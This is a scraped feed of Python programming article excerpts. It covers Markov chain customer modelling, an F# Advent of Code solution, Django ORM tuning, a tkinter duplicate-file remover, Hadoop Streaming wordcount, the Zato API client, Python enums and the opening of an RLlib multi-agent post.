Quantcast
Channel: CodeSection,代码区,Python开发技术文章_教程 - CodeSec
Viewing all 9596 articles
Browse latest View live

How to Build a Market Simulator Using Markov Chains and Python

$
0
0
How to Build a Market Simulator Using Markov Chains andpython

Model customer behavior, visualize A/B test results, predict user metrics…all using a simple Markovian framework!


How to Build a Market Simulator Using Markov Chains and Python
final product

In this article, I aim to introduce you (regardless of your technical ability) to Markov chains and use it to simulate customer behavior.

This isn’t going to be a traditional “how to” tutorial with code snippets every two lines. My primary aim in writing this is to provide you with a conceptual framework that you can flexibly use, so you do not necessarily have to code along to learn something new. Technical details will pop up here and there, but I will provide as much intuition for them as possible.

Data Processing

For this analysis I will be using Credit Sesame’s analytics data that I was provided with during a datathon. You can use any user data provided it spans your time-frame of interest (for example a week’s/month’s/year’s worth of data). It should follow a structure similar to the one below.


How to Build a Market Simulator Using Markov Chains and Python
example data

Examples of action can be “clicked offer/ad”, “clicked subscribe” etc. Columns can also be other metrics such as page views or revenue. Include any column you think will be useful for what you plan on modeling ― in my case, it is user engagement.

Customer Segmentation

Select a particular day in your dataset and get new-user data for that particular day . I am modeling how new users behave within 30 days of using Credit Sesame’s website.


How to Build a Market Simulator Using Markov Chains and Python
new user data on a particular day

Next, we segment our customers into different categories or states. There are many ways you can do this.

You can apply a scoring function : Give each user a score indicating their overall engagement. You could have higher weights for actions you think influence higher user engagement such as “session length”.

You can then divide the distribution into 3 segments (Inactive, Active and Very Active) based on your heuristics.


How to Build a Market Simulator Using Markov Chains and Python
Distribution of applied scorefunction

2. Apply an unsupervised algorithm such as k-means: You may use clustering algorithms such as k-means to cluster similarly engaged customers. Each cluster would have their own distinct properties which are hopefully the ones you wish to model. You could even apply the algorithm on your previously calculated score function (univariate data) to make it even simpler.


How to Build a Market Simulator Using Markov Chains and Python
K-means segments visualized on the scorefunction
How to Build a Market Simulator Using Markov Chains and Python
after segmentation on first-day data. 1 = inactive user, 2 = active user, 3 = very activeuser.

After segmenting first day data, you pick a time-frame. I chose to go with a month as I believe Credit Sesame has a lot of returning users and the magnitude of that can be captured with a month’s worth of data. After 30 days, users would have had the opportunity to shift to and from each segment: very active users may become inactive, moderately active users may become very active, and so on.

Apply segmentation to this post-30-day data. Make sure you account for the time frame (for example, average your engagement score for the 30 days).


How to Build a Market Simulator Using Markov Chains and Python
segmentation applied to 30-daydata

Let’s visualize the results:


How to Build a Market Simulator Using Markov Chains and Python

As expected, the number of users who became inactive rose over the 30 days and the number of users who stayed active and very active decreased.

Onto applying the Markov framework

Markov Chains Groundwork

Markov chains are simply mathematical systems that model state-to-state movement using certain probabilistic rules and fixed assumptions.

To put it more simply, when you have a system with fixed states (or segments), and agents/users who can move between those states with a certain fixed probability, you can model it using a Markov chain.

But let us first see if our system satisfies the assumptions of a Markov model:

ASSUMPTION 1: There are a finite set of states. In our system there only 3 segments customers can move in and out of. ASSUMPTION 2: The probabilities of moving between states are fixed. I admit, this is a strong assumption. While my system does take into account hundreds of thousands of user data points, it is easy to believe the variance of probabilities for different 30 day time frames shouldn’t be too large. But even with a lot of data, as we will see later on in the article, we have to be cautious. ASSUMPTION 3: State accessibility. Users in any segment can move to a different segment without any external restriction. ASSUMPTION 4: Non-cyclic. The segment-to-segment movement is in no way ‘automatic’ in our system, so this assumption is satisfied.

Our system performs well against most assumptions of the Markov chain. This gives us some confidence in our model estimates, which we will get to once we build the model.

Constructing the MarkovChain

There are three parts to a Markov chain that are best represented as matrix-vector multiplication. If you are completely new to linear algebra, I would recommend going through this link before proceeding with the article.


How to Build a Market Simulator Using Markov Chains and Python
N represents the number ofsegments

The initial state in our system is a 3x1 vector that represents the number of users in each segment. The end state is also a 3x1 vector that shows the number of users in each segment after the first month (after we multiply the initial state vector with the probabilities matrix). The transition probability matrix is a 3x3 matrix that represents the fixed probabilities of moving to and from different customer segments.

So how do we calculate these fixed probabilities?


How to Build a Market Simulator Using Markov Chains and Python

From our recorded segment movements. We look at how users from each segment on day 1 moved to various segments after 30 days and calculate the probabilities accordingly (equivalent to proportions).

0.89 (in the picture) refers to the probability that someone in segment 1 on day 1 stays in the same segment after 30 days i.e. it is the probability that an inactive user will stay inactive after 30 days. Note, the probabilities in each column must add up to 1. We repeat this process for all segments and build the final transition matrix:


How to Build a Market Simulator Using Markov Chains and Python
Deconstructing the transition matrix for a c

A Tale of Two Functions

$
0
0
In Which Ben Learns 1 Is The Loneliest Number

So, my biggest shortcoming as a developer is my toolkit of algorithms at my fingertips by instinct. It's not that I'm not pretty familiar with the basics, at least, but I still haven't put in the time necessary to immediately look at a problem and say "oh, this is that that other problem". At least not at 7 in the morning warming up from the frigid trudge up the hill well before my shift. Advent of Code makes fools of us all.

This is the story of how I instinctively reached for the dumb thing even knowing it was dumb instead of taking a second and thinking about it and wasted precious, precious leaderboard points because of it. The humanity.

This is a beginner-level post, even if you aren't terribly comfy with F#/ML.

The Exposition

Day 5 has us comparing successive characters. If they're a pair of one lower case and one upper case of the same letter both are dropped from the set, and otherwise the process continues. We're done when we're out of pairs.

We'll start with the wrong way. Because this is my 5th problem ever in F# and it's been some time since I've used an ML, I wanted to do it recursively! Hooray! I just forgot that doesn't always mean the same thing.

I also am on a swap week - I'm used to a cushy 90 minutes before I switch off and do numbers all morning until lunch, but this week I only had 60! The clock was ticking on this one but I was amped from Day 4 where my first go did the trick, more or less, and went in cocky. Luckily, I know all about how to solve stuff recursively, I have a few days of ironing out the unfamiliar edges of the languages behind me, and this problem looks like a piece of cake. I'm not going for style on the first time through, I'm going for that sweet, sweet answer.

What I missed at this crucial juncture is (as so many others noted rather quickly) that this only takes a single pass to do. As soon as you swap a pair you should check right then and there if you need to swap again and keep doing that until you're through - that's all it takes! Viola, processed. It's not unlike the Matching Parenthesis problem - clearly the intended solution. The example given in the problem description even does that operation right there in front of you, by the way. You can't miss it.

I made no such magical leap, though. I missed it. In my first instinct I just saw an operation that needed doing and tried-and-true way to ensure it got done.

I knew I'd want to compare two elements at once as we go through to check if they react, and I'd need a way to tell it to run through again if we made changes to see if any new pairs popped up. After all, this general pattern worked for me on Day 1, part 2:

let rec addFreqWithState acc visited whole remaining = match remaining with | [] -> addFreqWithState acc visited whole whole | head::tail -> let newval = acc + head if Set.contains newval visited then newval else addFreqWithState newval (Set.add newval visited) whole tail

Now, if you're shaking your head by this point, good. You should be. Heck, I was. I looked at the input string - it's huge. This thing is about to do a ton of work, I just knew it before writing any code, but I didn't think it could possibly take that long and I'd just come back later and find a better solution after I got my little happy star - winter, amirite?

I'll just store what I need as parameter to the recursive function - a boolean for whether or not we're done and the original string to start over with. In fact, I'll just drain one into the other and flop them! How simple, how nice. Almost warm and cozy, like a nice cup of ML should be.

The First Go

I'll start by building the base case:

let rec reactString altered result input = match result with | [] -> if altered then reactString false "" (string result |> List.ofSeq) else result

If it made any changes on this run, then recur again resetting everything, using the new result to create our input list of chars. If it didn't - so, you know, it just ran all the way through again doing zero work to ascertain this, it can finally give us back the damn result string.

Okay. One case in and it already hurts, but time is money. Let's write the other part and get on with it.

let rec reactString altered result input = match result with | [] -> if altered then reactString false "" (string result |> List.ofSeq) else result | head::next::tail -> if doesReact head next then reactString true result tail else reactString altered (result + string head) ([next] @ tail)

I get at the first two by destructuring the input list and calling them head and next . I check if they react:

let doesReact first second = (System.Char.ToUpper first = System.Char.ToUpper second) && first <> second

One of the first initial gotchas right out of the gate with F# is the equality operators - instead of == and != you're working with = and <> .

If they do react, then we make sure we note that in the boolean we're passing along and recur with tail - everything after the two we just checked.

We did totally move on from any new pair we created in the result, but it's cool, yo. We'll catch 'em on the next go-round! (oof).

If they didn't react, we're recurring through input again but "draining" it into result - add the head and keep next up with the input list for the next iteration.

At this point the compiler helpfully reminds me there's lists with one element, and I have to deal with that reality. Thanks, compile-time enforced correctness! I don't really want to think about it, so we'll "base case" that too - here's our final iteration:

let rec reactString altered result input = match input with | [] -> if altered then reactString false "" (string result |> List.ofSeq) else result | [a] -> if altered then reactString false "" (string result + string a |> List.ofSeq) else result + string a | head::next::tail -> if doesReact head next then reactString true result tail else reactString altered (result + string head) ([next] @ tail) |> Seq.length It's almost the same as for [] - it definitely won't react so we don't check - but we pass it along either back into the input list if needed or add to our accumulated result string.

It ain't pretty, but it'll do.

And do it did - pretty much on the first try, which has been my favorite thing about F#. Not first try, exactly, but the first successful compile usually does what I meant. Getting the actual problem answers just involve running this once and then running it a bunch of times on different permutations of the input, removing specific letters at a time and trying again, so here's where any real work is happening. It did what I asked of it, and my answers were correct.

I literally aged while it did it, though. I started unlocking cabinets, I went to the bathroom, I chatted with Mike down the hall, another early-bird. Didn't finish. I went and grabbed the mail, filtered my emails - nothing.

I left my laptop open on my desk. It's an old laptop - late 2011 Thinkpad. It's doing its best. Curses!

It finishes, just twelve minutes until work begins. I had misread the problem - it didn't want the letter that was most optimal, it wanted the resulting length of that string. The result of that massive computation, that measly 'j' was staring at me, taunting me. I had to run it again . Minutes were ticking by and I still didn't have what I needed - even though I did have "the right answer".

Luckily, made the code change in under two minutes. And started it again.

Endless minutes go by. 8 AM comes. I start work, glancing every few minutes as I get my day organized. The phone starts ringing and the emails start coming as my colleagues roll in and I don't get to check back until maybe an excruciating hour later and there it is, smug as ever - the right friggin' answer. Ouch.

The Realization

It took not two seconds. I opened the thread, got to the top post from@aspittel , and got two lines in to the function

def react(text): stack = []

Ohhhhh . Oh right. Make a stack. It all was so crystal clear in a moment. But alas - the time had come. I had a bunch of contract adjustments to do before I could dive back in.

The Fix

Fast-forward to lunch, and I simply translate hers:


A Tale of Two Functions
Ali Spittel

Dec 5

Dumb order of operations mistake got me to this point was missing the parens around the last half of the conditional since like 12:20. This mirrors the classic stack match parentheses problem.

My solution is kinda pretty though:

with open('input.txt', 'r') as f: text = '' for line in f: text += line.strip() def react(text): stack = [] for letter in text: last = stack[-1] if stack else None if letter != last and (last == letter.upper() or last == letter.lower()): stack.pop() else: stack.append(letter) return len(stack) # A1 print(react(text)) # A2 possibilities = set(text.lower()) print(min(react(text.replace(p, '').replace(p.upper(), '')) for p in possibilities))

Mine looks almost identical, just ML-style. Instead of a for loop, I'm folding into an Array . It doesn't take long - maybe 5 minutes to get it to compile:

let reactQuickly input = Seq.fold (fun s c -> let last = if Array.length s > 0 then Some (Array.last s) else None match last with | Some x -> if c <> x && (x = System.Char.ToUpper c || x = System.Char.ToLower c) then Array.sub s 0 (Array.length s - 1) else Array.append s [| c |] | None -> Array.append s [| c |]) [| |] input |> Array.length

While I generally like ML-type syntax, even above most other languages I've tried, I've gotta say her python version looks very nice and clean in comparison. They do the same thing.

On each iteration, s is our result array - the stack in her implementation. I use c for the character from the input we're looking at - sometimes I just prefer el here to convey the element of the list we're folding over.

To get at two at a time, instead of looking forward we look back into the stack. We've got access to it right there in the function. If it's empty we store a None so we know to just push whatever the string starts with on the first iteration and otherwise we check the current character against the top of the stack.

Instead of stack.pop we just return a subset of our accumulator, which has the same effect. That's it though.

To check if it worked, all I did was replace the word reactString with reactQuickly . Same answers in three seconds on that old laptop, under one second on my desktop at home.

It turns out one pass is fewer passes than lots and lots of passes. Go figure.

See here for the complete file.

Optimize the Django ORM

$
0
0

Recently, I have been optimizing some functions that were slower than expected. As with most MVPs, the initial iteration was to get something working and out there. Looking at Scout APM revealed that some of the database queries were slow, including several n+1 queries. The n+1 queries happened because I was looping over a set of models, and either updated or selected the same thing for each model. My goal was to reduce any duplicate queries, and squeeze out as much performance as I could by refactoring the naive, straight-forward operations into more performant equivalents.

In all honesty, the code is slightly more complicated to read through now, but I cut the time for my use-case in half without changing anything else about the server or database.

Use the ORM, Luke

One of Django's main benefits is the built-in models and object-relational mapper (ORM). It provides a quick to use, common interface for data operations for your models and can handle most queries pretty easily. It can also do some tricky SQL once you understand the syntax.

It's easy to get building quickly. It’s also easy to end up making more (costly) SQL calls than you realize.

Hasta la vista, models

Here are some sample models that will be used to illustrate some of the concepts below.

# models.py class Author(models.Model): name = models.CharField(max_length=50) class Book(models.Model): author = models.ForeignKey(Author, related_name="books", on_delete=models.PROTECT) title = models.CharField(max_length=255) Show me the sql (part 1)

Because the SQL calls are abstracted behind a simple API, it's easy to end up making more SQL calls than you realize. You can retrieve a close approximation with the query attribute on a QuerySet, but heed the warning about it being an " opaque representation ".

books = Book.objects.all() print("books.query", books.query) Show me the sql (part 2)

You can also add django.db.logging to your configured loggers to see generated SQL get printed out to the console.

"loggers": { "django.db.backends": { "level": "DEBUG", "handlers': ["console", ], } } Show me the sql (part 3)

You can also print out the time and generated SQL that Django stores on the database connection.

from django.db import connection books = Book.objects.all() print("connection.queries", connection.queries) The one Toolbar to rule them all

If your code is called from a view, the easiest way to start deciphering what SQL is generated is installing Django Debug Toolbar . DDT provides an unbelievably helpful diagnostic tool which shows all of the SQL queries being run, how many are similar to each other and how many are duplicated. You can also look at the query plan for each SQL query and dig into why it might be slow.

Select and prefetch all the relateds

One thing to realize is that Django's ORM is pretty lazy by default. It will not run queries until the result has been asked for (either in code or directly in a view). It also won't join models by their ForeignKeys until needed. Those are beneficial optimizations, however they can bite you if you don't realize.

# views.py def index(request): books = Book.objects.all() return render(request, { "books": books }) <!-- index.html -->{% raw %} {% for book in books %} Book Author: {{ book.author.name }}<br /> {% endfor %}{% endraw %}

In the code above, each book in the for loop in index.html will call the database again for the author's name. So, there would be 1 database call for all of the books, and then an additional database to get each author's name.

The way to prevent the extra database calls is to use select_related to force Django to join to the other model once and prevent subsequent calls if that relation is used.

Updating the view code to use a select_related would reduce the total sql calls to only 1 for the same Django template.

# views.py def index(request): books = Book.objects.select_related("author").all() return render(request, { "books": books })

In some cases select_related won't work, but prefetch_related will. The Django documentation has lots more details about when to use prefetch_related .

Beware the instantiating of models

When the Django ORM creates a QuerySet it takes the data retrieved from the database and populates the models. However, if you don't need a model, there are a few ways to skip constructing them unnecessarily.

values_list will return a list of tuples for all of the columns specified. Particularly useful is the flat=True keyword argument which returns a regular list if only one field is specified.

# get a list of book ids to use later book_ids = Book.objects.all().values_list("id", flat=True)

Another pattern that I have done in the past is to create a dictionary with pair of data that is required. For example, if I was going to need blog ids and their urls:

# get a dictionary of book id->title book_ids_to_titles = {b.get("id"): b.get("title") for b in Book.objects.all().values("id", "title")}

To get all of the book ids: book_ids_to_titles.keys() . The get all titles: book_ids_to_titles.values() .

Somewhat related, bidict is a easy library to use if you need an easy way to retrieve a dictionary's key form it's value and vice versa (as opposed to keeping around 2 dictionaries).

Filtering on ids makes the world go 'round

Using filter translates to a WHERE clause in SQL, and searching for an integer will almost always be faster than searching on a string in Postgres. So, Book.objects.filter(id__in=book_ids) will be slightly more performant than Book.objects.filter(title__in=book_titles) .

Only and defer to your heart's content

Only and Defer are mirror opposite methods to acheive the same goal of only retrieving particular fields for your model. Only works by SELECTing the specified database fields, but not filling in any non-specified fields. Defer works the opposite way, so the fields will not be included in the SELECT statement.

However, this note in the Django documentation is telling:

They provide an optimization for when you have analyzed your queries closely and understand exactly what information you need and have measured that the difference

Annotate and carry on

For some code, I was getting a count for each model in a list in a loop.

for author in Author.objects.all(): book_count = author.books.count() print(f"{book_count} books by {author.name}")

This will create one SQL SELECT statement for every author. Instead, using an annotation will create one SQL query.

author_counts = ( Author.objects .annotate(book_count=Count("book__id")) .values("author__name", "book_count") ) for obj in author_counts: print(f"{obj.get('book_count')} books by {obj.get('author__name')}")

Aggregation is the simpler version of annotation if you want calculate a value for all objects in a list (e.g. get the maximum id from a list of models). Annotation is useful if you want to calculate values over each model in a list and get the output.

Bulk smash ! Errr, create

Creating multiple objects with one query is possible with bulk_create . There are some caveats to using bulk_create , and unfortunately you don't get a list of ids created after the insert which would be useful. But, for simple use-cases it works great.

author = Author(name="Neil Gaiman") author.save() Book.objects.bulk_create([ Book(title="Neverwhere", author=author), Book(title="The Graveyard Book", author=author), Book(title="The Ocean at the End of Lane", author=author), ]) We want to bulk you up

update is a method on QuerySet , so you are able to retrieve a set of objects and update a field on all of them with one SQL query. However, if you want to update a set of models with different field values django-bulk-update will come in handy. This package lets you create one SQL statement for a set of model updates even if they have differing values.

from django.utils import timezone from django_bulk_update.helper import bulk_update books = Book.objects.all() for book in books: book.title = f"{book.title} - {timezone.now}" # generates 1 sql query to update all books bulk_update(books, update_fields=['title']) Gonna make you sweat (everybody Raw Sql now)

If you really can't figure out a way to get the Django ORM to generate performant SQL, raw sql is always available, although it's not generally advised to use it unless you have to.

Putting on the ritz

The Django documentation is generally really helpful and will give you more in-depth details about each technique above. If you know of any other approaches to squeezing the most performance out of Django, I would love to hear about them on @adamghill .

Originally published on adamghill.com .

codingdirectional: Delete duplicate file with python program

$
0
0

In this article we will start to explore the technique which we will use to delete a duplicate file in our computer folder. The main objective in this chapter is to select a file in one folder and then searches and deletes the file with the same filename as the one which we have selected earlier. We will use back the same program which we have created in the previous chapter to delete the duplicate file in the computer hard drive.

First of all there are not many changes in the main file, I just include another if statement to make sure that a new remove thread instance will only get created if the folder which we want to search for the duplicate file has been selected.

from tkinter import *
from tkinter import filedialog
from Remove import Remove
import os
win = Tk() # 1 Create instance
win.title("Multitas") # 2 Add a title
win.resizable(0, 0) # 3 Disable resizing the GUI
win.configure(background='black') # 4 change background color
# 5 Create a label
aLabel = Label(win, text="Remove duplicate", anchor="center")
aLabel.grid(column=0, row=1)
aLabel.configure(foreground="white")
aLabel.configure(background="black")
# 6 Create a selectFile function to be used by button
def selectFile():
filename = filedialog.askopenfilename(initialdir="/", title="Select file")
if(filename != ''):
filename = filename.split('/')[-1] # this is for the windows separator only
folder = filedialog.askdirectory() # 7 open a folder then create and start a new remove thread to delete the duplicate file
if(folder != ''):
remove = Remove(folder, aLabel, filename)
remove.start()
# 8 Adding a Button
action = Button(win, text="Open Folder", command=selectFile)
action.grid(column=0, row=0) # 9 Position the button
action.configure(background='brown')
action.configure(foreground='white')
win.mainloop() # 10 start GUI

Next we will delete the duplicate file if we found one in another folder.

import threading
import os
class Remove(threading.Thread):
def __init__(self, massage, aLabel, filename):
threading.Thread.__init__(self)
self.massage = massage
self.label = aLabel
self.filename = filename
def run(self):
text_filename = 'The is no duplicate item'
filepaths = os.listdir(self.massage)
for filepath in list(filepaths):
if(filepath == self.filename):
os.chdir(self.massage)
os.remove(filepath)
text_filename = filepath + ' has been removed'
self.label.config(text=text_filename)
return

This is just the beginning of this project which we will search within folders to further look for the file with the same name in the next chapter. But we will not stop there because what we really want to achieve is to delete a file with the same content instead of with the same name because the file with the same name might contains different contents which means that it is not a duplicate file after all, but for now lets pretend it is, the most important strategy of writing program is to build up the framework first.

用Python来写MapReduce之Wordcount

$
0
0
前言

虽然Hadoop是用Java编写的一个框架, 但是并不意味着他只能使用Java语言来操作, 在Hadoop-0.14.1版本后, Hadoop支持了python和C++语言, 在 Hadoop的文档 中也表示可以使用Python进行开发, 通常来说都会考虑将源码打包成jar包再运行, 例子: PythonWordCount 这明显不方便. 在Hadoop的文档中提到了 Hadoop Streaming , 我们可以使用流的方式来操作它.

它的语法是

hadoop jar hadoop-streaming-2.9.2.jar \ -input myInputDirs \ -output myOutputDir \ -mapper /bin/cat \ -reducer /usr/bin/wc

指定输入输出文件和mapper, reducer即可.

在Python中的sys包中存在, stdin和stdout,输入输出流, 我们可以利用这个方式来进行MapReduce的编写. 本文以WordCount进行举例

Coding

我们在工程目录下创建两个文件,分别是mapper.py和reducer.py, 之后使用命令 chmod +x mapper.py 来给他们赋予执行权限.

Mapper #!/usr/bin/env python # -*- coding: utf-8 -*- """ ------------------------------- FileName: mapper Author: ying Date: 18-12-6 ------------------------------- Change Activity: 18-12-6 """ import sys __author__ = "YingJoy" for line in sys.stdin: # 捕获输入流 line = line.strip() words = line.split() for word in words: # 注意这里哦 print("%s\t%s" % (word, 1)) Reducer #!/usr/bin/env python # -*- coding: utf-8 -*- """ ------------------------------- FileName: reducer Author: ying Date: 18-12-6 ------------------------------- Change Activity: 18-12-6 """ import sys __author__ = "YingJoy" word_dict = {} for line in sys.stdin: line = line.strip() word, count = line.split('\t') try: count = int(count) except ValueError: continue if word in word_dict: word_dict[word] += 1 else: word_dict.setdefault(word, 1) for k, v in word_dict.items(): print('%s\t%s' % (k, v)) 测试代码

这里使用linux的管道来进行测试, 将前一项的输出作为后一项的输入

echo "foo foo quux labs foo bar quux" | ./mapper.py ` foo 1 foo 1 quux 1 labs 1 foo 1 bar 1 quux 1 ` echo "foo foo quux labs foo bar quux" | ./mapper.py | sort -k1,1 | ./reducer.py ` bar 1 foo 3 labs 1 quux 2 ` 在Hadoop上运行代码 准备

首先我们在 http://www.gutenberg.org/ 这个网站上随便下基本电子书(选择Plain Text UTF-8)

然后使用命令将文本上传到HDFS中

# 创建文件夹, 否则出错 hdfs dfs -mkdir gutenberg hdfs dfs -put *.txt gutenberg hdfs dfs -ls gutenberg 这里说明一下, HDFS的相对目录, 是相对于当前用户的目录, 如我的用户是 ying , 它默认的位置就是 /user/ying
然后你就可以在HDFS看到刚刚上传的文件了
用Python来写MapReduce之Wordcount
启动MapReduce任务

运行下面的命令

hadoop jar /opt/hadoop-2.9.2/share/hadoop/tools/lib/hadoop-streaming-2.9.2.jar -file ./mapper.py -mapper ./mapper.py -file ./reducer.py -reducer ./reducer.py -input /user/ying/gutenberg/* -output /user/ying/output

注意,这里使用的hadoop命令, 如果你使用hdfs命令会报错误: 找不到主类

运行之后你可以在本地: localhost:8088 看到你的任务, 如图


用Python来写MapReduce之Wordcount
用Python来写MapReduce之Wordcount

等待任务完成即可在输出目录下看到结果,注意这里的output目录运行之前不能存在,否则报错


用Python来写MapReduce之Wordcount

Access functions via Dictionary

$
0
0

I have a function like this:

def abc(a,b): return a+b

And I want to assign it to a dictionary like this:

functions = {'abc': abc(a,b)}

The trouble is, when assigning it to the dictionary, since the arguments are not yet defined, I get the error:

NameError: name 'a' is not defined

I would do the obvious thing and define the arguments ahead of time but I need to define them in a loop (and then call the function based on locating it in a list) like this:

functions_to_call = ['abc'] for f in functions_to_call: a=3 b=4 #This is supposed to locate and run the function from the dictionary if it is in the list of functions. if f in functions: functions[f] I need to define them in a loop (and then call the function based on locating it in a list)

Then what's the issue with simply saving the function object in the dictionary:

functions = {'abc':abc}

and then applying a and b to the function while looping:

functions_to_call = ['abc'] for f in functions_to_call: a, b = 3, 4 if f in functions: functions[f](a, b)

Zato Blog: Introducing Zato public API services

$
0
0

This article offers a high-level overview of the public services that Zato offers to users wishing to manage their environments in an API-driven manner in addition to web-admin and enmasse tools.

Overview

Most users start to interact with Zato via its web-based admin console. This works very well and is a great way to get started with the platform.

In terms of automation, the next natural step is to employ enmasse which lets one move data across environments using YAML import/export files.

The third way is to use the API services - anything that can be done in web-admin or enmasse is also available via dedicated API services. Indeed, both web-admin and enmasse are clients of the same services that users can put to work in their own integration needs.

The public API is built around a REST endpoint that accepts and produces JSON. Moreover, a purpose-built python client can access all the services whereas an OpenAPI-based specification lets one generate clients in any language or framework that supports this popular format.

Python usage examples follow in the blog post but the full documentation has more information about REST and OpenAPI too.

Prerequisites

First thing needed is to set a password for the API client that will be used, it is an HTTP Basic Auth definition whose username is pubapi. Remember, however, that there are no default secrets in Zato ever so the automatically generated password cannot be used. To change the password, navigate in web-admin to Security -> HTTP Basic Auth and click Change password for the pubapi user.


Zato Blog: Introducing Zato public API services

Now, we can install the Python client package from PyPI. It does not matter how it is installed, it can be done under a virtual environment or not, but for simplicity, let's install it system-wide:

$ sudo pip install zato-client

This is it as far as prerequisites go, everything is ready to invoke the public services now.

Invoking API services

For illustration purposes, let's say we would like to be able to list and create ElasticSearch connections.

The easiest way to learn how to achieve it is to let web-admin do it first - each time a page in web-admin is accessed or an action like creating a new connection is performed, one or more entries are stored in admin.log files on the server that handles the call. That is, admin.log is the file that lists all the public API services invoked along with their input/output.

For instance, when you list ElasticSearch connections, here is what is saved in admin.log:

INFO - name:`zato.search.es.get-list`, request:`{'cluster_id': 1}` INFO - name:`zato.search.es.get-list`, response:`' {"zato_search_es_get_list_response": [], "_meta": {"next_page": null, "num_pages": 0, "prev_page": null, "has_prev_page": false, "cur_page": 1, "page_size": 50, "has_next_page": false, "total": 0}}'

It is easy to discern that:

The service invoked was zato.search.es.get-list Its sole input was the cluster ID to return connections for There were no connections returned on output which makes sense because we have not created any yet

Let's do the same in Python now:

# Where to find the client from zato.client import APIClient # Credentials username = 'pubapi' password = '<secret>' # Address to invoke address = 'http://localhost:11223' # Build the client client = APIClient(address, username, password) # Choose the service to invoke and its request service_name = 'zato.search.es.get-list' request = {'cluster_id':1} # Invoke the API service response = client.invoke(service_name, request) # And display the response print(response.data)

Just like expected, the list of connections is empty:

$ python pubapi.py [] $

Navigate to web-admin and create a new connection via Connections -> Search -> ElasticSearch, as below:


Zato Blog: Introducing Zato public API services

Let's re-run the Python example now to witness that the newly created connection can in fact be obtained from the service:

$ python pubapi.py [{ u'name': u'My Connection', u'is_active': True, u'hosts': u'127.0.0.1:9200\r\n', u'opaque1': u'{}', u'timeout': 5, u'body_as': u'POST', u'id': 1 }] $

But this is not over yet - we still need to create a new connection ourselves through an API service. If you kept admin.log opened while the connection was being created in web-admin, you noticed that the service to do it was called zato.search.es.create and that its input was saved to admin.log too so we can just modify our Python code already:

# Where to find the client from zato.client import APIClient # Credentials username = 'pubapi' password = '<secret>' # Address to invoke address = 'http://localhost:11223' # Build the client client = APIClient(address, username, password) # First, create a new connection service_name = 'zato.search.es.create' request = { 'cluster_id':1, 'name':'API-created connection', 'hosts': '127.0.0.1:9201', 'timeout': 10, 'body_as': 'POST' } client.invoke(service_name, request) # Now, get the list of connections, it should include the newly created one service_name = 'zato.search.es.get-list' request = {'cluster_id':1} response = client.invoke(service_name, request) # And display the response print(response.data)

This is a success again because on output we now have both the connection created in web-admin as well as the one created from the API client:

$ python pubapi.py [{ u'name': u'API-created connection', u'is_active': True, u'hosts': u'127.0.0.1:9201', u'opaque1': u'{}', u'timeout': 10, u'body_as': u'POST', u'id': 2 }, { u'name': u'My Connection', u'is_active': True, u'hosts': u'127.0.0.1:9200\r\n', u'opaque1': u'{}', u'timeout': 5, u'body_as': u'POST', u'id': 1 }] $

Just to double-check it, we can also list the connections in web-admin and confirm that both are returned:


Zato Blog: Introducing Zato public API services
Summary

That is really it. The process is as straightforward as it can get - create a client object, choose a service to invoke, give it a dict request and a Python object is returned on output.

Note that this post covered Python only but everything applies to REST and OpenAPI-based clients too - the possibilities to interact with the public API are virtually limitless and may include deployment automation, tools to test installation procedures or custom command and control centers and administration dashboards.

Python 的枚举类型

$
0
0
起步

python 的原生类型中并不包含枚举类型。为了提供更好的解决方案,Python 通过 PEP 435 在 3.4 版本中添加了 enum 标准库。

枚举类型可以看作是一种标签或是一系列常量的集合,通常用于表示某些特定的有限集合,例如星期、月份、状态等。在没有专门提供枚举类型的时候我们是怎么做呢,一般就通过字典或类来实现:

Color = { 'RED' : 1, 'GREEN': 2, 'BLUE' : 3, } class Color: RED = 1 GREEN = 2 BLUE = 3

这种来实现枚举如果小心翼翼地使用当然没什么问题,毕竟是一种妥协的解决方案。它的隐患在于可以被修改。

使用 Enum

更好的方式是使用标准库提供的 Enum 类型,官方库值得信赖。3.4 之前的版本也可以通过 pip install enum 下载支持的库。简单的示例:

from enum import Enum class Color(Enum): red = 1 green = 2 blue = 3

枚举成员有值(默认可重复),枚举成员具有友好的字符串表示:

>>> print(Color.red) Color.red >>> print(repr(Color.red)) <Color.red: 1> >>> type(Color.red) <Enum 'Color'> >>> isinstance(Color.green, Color) True

枚举类型不可实例化,不可更改。

定义枚举 定义枚举时,成员名不允许重复 class Color(Enum): red = 1 green = 2 red = 3 # TypeError: Attempted to reuse key: 'red' 成员值允许相同,第二个成员的名称被视作第一个成员的别名 class Color(Enum): red = 1 green = 2 blue = 1 print(Color.red) # Color.red print(Color.blue) # Color.red print(Color.red is Color.blue)# True print(Color(1)) # Color.red 在通过值获取枚举成员时,只能获取到第一个成员 若要不能定义相同的成员值,可以通过 unique 装饰 from enum import Enum, unique @unique class Color(Enum): red = 1 green = 2 blue = 1 # ValueError: duplicate values found in <enum 'Color'>: blue -> red 枚举取值

可以通过成员名来获取成员也可以通过成员值来获取成员:

print(Color['red']) # Color.red 通过成员名来获取成员 print(Color(1)) # Color.red 通过成员值来获取成员

每个成员都有名称属性和值属性:

member = Color.red print(member.name) # red print(member.value) # 1

支持迭代的方式遍历成员,按定义的顺序,如果有值重复的成员,只获取重复的第一个成员:

for color in Color: print(color)

特殊属性 __members__ 是一个将名称映射到成员的有序字典,也可以通过它来完成遍历:

for color in Color.__members__.items(): print(color) # ('red', <Color.red: 1>) 枚举比较

枚举的成员可以通过 is 同一性比较或通过 == 等值比较:

Color.red is Color.red Color.red is not Color.blue Color.blue == Color.red Color.blue != Color.red

枚举成员不能进行大小比较:

Color.red < Color.blue # TypeError: unorderable types: Color() < Color() 扩展枚举 IntEnum

IntEnum 是 Enum 的扩展,不同类型的整数枚举也可以相互比较:

from enum import IntEnum class Shape(IntEnum): circle = 1 square = 2 class Request(IntEnum): post = 1 get = 2 print(Shape.circle == 1) # True print(Shape.circle < 3) # True print(Shape.circle == Request.post) # True print(Shape.circle >= Request.post) # True


伯克利开源工具库 RLib 现已支持大规模多智能体强化学习

$
0
0

AI 前线导读:近日,UC 伯克利的研究团队 RISELab 在其 Github 的项目 Ray Rlib 0.6.0 中添加了面向多智能体强化学习(multi-agent Reinforcement Learning)的支持。本文由团队成员 Eric Liang 首发于 RISELab 团队主页,AI 前线翻译整理。本文主要是关于多智能体强化学习的简明教程,以及在 RLib 中的设计思路。

为什么要使用多智能体强化学习?

研究人员发现,在实际的强化学习设置中,很多问题都讨论到使用多智能体学习是否有意义。在特定的环境中,与训练单一策略的方案相比,多智能体方案能提供以下优点:

